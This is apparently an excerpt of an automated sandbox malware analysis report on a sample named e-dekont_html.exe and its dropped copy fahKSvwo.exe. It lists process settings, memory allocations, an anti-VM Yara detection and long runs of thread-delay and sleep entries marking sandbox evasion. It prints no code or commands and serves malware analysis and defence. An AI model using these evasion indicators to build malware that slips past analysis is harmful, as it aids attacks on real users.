                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: e-dekont_html.exe PID: 3756, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: fahKSvwo.exe PID: 7432, type: MEMORYSTR
                Source: C:\Users\user\Desktop\e-dekont_html.exeMemory allocated: 12A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeMemory allocated: 2C40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeMemory allocated: 4C40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeMemory allocated: 9010000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeMemory allocated: A010000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeMemory allocated: A220000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeMemory allocated: B220000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeMemory allocated: 2BD0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeMemory allocated: 2D90000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeMemory allocated: 4D90000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeMemory allocated: 2AC0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeMemory allocated: 2C90000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeMemory allocated: 2AC0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeMemory allocated: 8950000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeMemory allocated: 9950000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeMemory allocated: 9B40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeMemory allocated: AB40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeMemory allocated: 1590000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeMemory allocated: 32A0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeMemory allocated: 31A0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 599890Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 599781Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 599668Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 599562Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 599453Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 599344Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 599234Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 599124Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 599015Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 598897Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 598781Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 598660Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 598516Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 598406Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 598292Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 598187Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 598078Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 597969Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 597844Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 597665Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 597494Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 597344Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 597234Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 597125Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 597016Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 596891Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 596766Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 596656Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 596547Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 596437Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 596328Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 596219Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 596109Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 596000Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 595891Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 595766Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 595641Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 595531Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 595422Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 595313Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 595188Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 595063Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 594930Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 594652Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 594540Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 594422Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 594312Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 594203Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 594094Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 593983Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 593875Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 593766Jump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 600000
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 599875
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 599766
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 599654
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 599545
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 599437
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 599328
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 599219
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 599094
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 598984
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 598875
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 598765
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 598656
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 598546
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 598402
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 598183
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 598078
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 597953
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 597844
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 597731
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 597582
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 597453
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 597344
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 597233
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 597125
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 597016
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 596906
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 596797
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 596688
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 596563
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 596453
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 596344
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 596219
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 596110
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 595985
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 595860
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 595735
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 595610
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 595485
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 595326
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 595206
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 594746
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 594641
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 594516
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 594406
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 594297
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 594187
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 594078
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 593969
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 593839
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7347Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2269Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6693Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2858Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeWindow / User API: threadDelayed 4133Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeWindow / User API: threadDelayed 5695Jump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeWindow / User API: threadDelayed 4271
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeWindow / User API: threadDelayed 5574
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 6036Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7328Thread sleep time: -13835058055282155s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7344Thread sleep time: -14757395258967632s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516Thread sleep count: 38 > 30Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516Thread sleep time: -35048813740048126s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7520Thread sleep count: 4133 > 30Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516Thread sleep time: -599890s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516Thread sleep time: -599781s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516Thread sleep time: -599668s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7520Thread sleep count: 5695 > 30Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516Thread sleep time: -599562s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516Thread sleep time: -599453s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516Thread sleep time: -599344s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516Thread sleep time: -599234s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516Thread sleep time: -599124s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516Thread sleep time: -599015s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516Thread sleep time: -598897s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516Thread sleep time: -598781s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516Thread sleep time: -598660s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516Thread sleep time: -598516s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516Thread sleep time: -598406s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516Thread sleep time: -598292s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516Thread sleep time: -598187s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516Thread sleep time: -598078s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516Thread sleep time: -597969s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516Thread sleep time: -597844s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516Thread sleep time: -597665s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516Thread sleep time: -597494s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516Thread sleep time: -597344s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516Thread sleep time: -597234s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516Thread sleep time: -597125s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516Thread sleep time: -597016s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516Thread sleep time: -596891s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516Thread sleep time: -596766s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516Thread sleep time: -596656s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516Thread sleep time: -596547s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516Thread sleep time: -596437s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516Thread sleep time: -596328s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516Thread sleep time: -596219s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516Thread sleep time: -596109s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516Thread sleep time: -596000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516Thread sleep time: -595891s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516Thread sleep time: -595766s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516Thread sleep time: -595641s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516Thread sleep time: -595531s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516Thread sleep time: -595422s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516Thread sleep time: -595313s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516Thread sleep time: -595188s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516Thread sleep time: -595063s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516Thread sleep time: -594930s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516Thread sleep time: -594652s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516Thread sleep time: -594540s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516Thread sleep time: -594422s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516Thread sleep time: -594312s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516Thread sleep time: -594203s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516Thread sleep time: -594094s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516Thread sleep time: -593983s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516Thread sleep time: -593875s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516Thread sleep time: -593766s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7464Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792Thread sleep count: 38 > 30
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792Thread sleep time: -35048813740048126s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792Thread sleep time: -600000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7796Thread sleep count: 4271 > 30
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792Thread sleep time: -599875s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7796Thread sleep count: 5574 > 30
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792Thread sleep time: -599766s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792Thread sleep time: -599654s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792Thread sleep time: -599545s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792Thread sleep time: -599437s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792Thread sleep time: -599328s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792Thread sleep time: -599219s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792Thread sleep time: -599094s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792Thread sleep time: -598984s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792Thread sleep time: -598875s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792Thread sleep time: -598765s >= -30000s
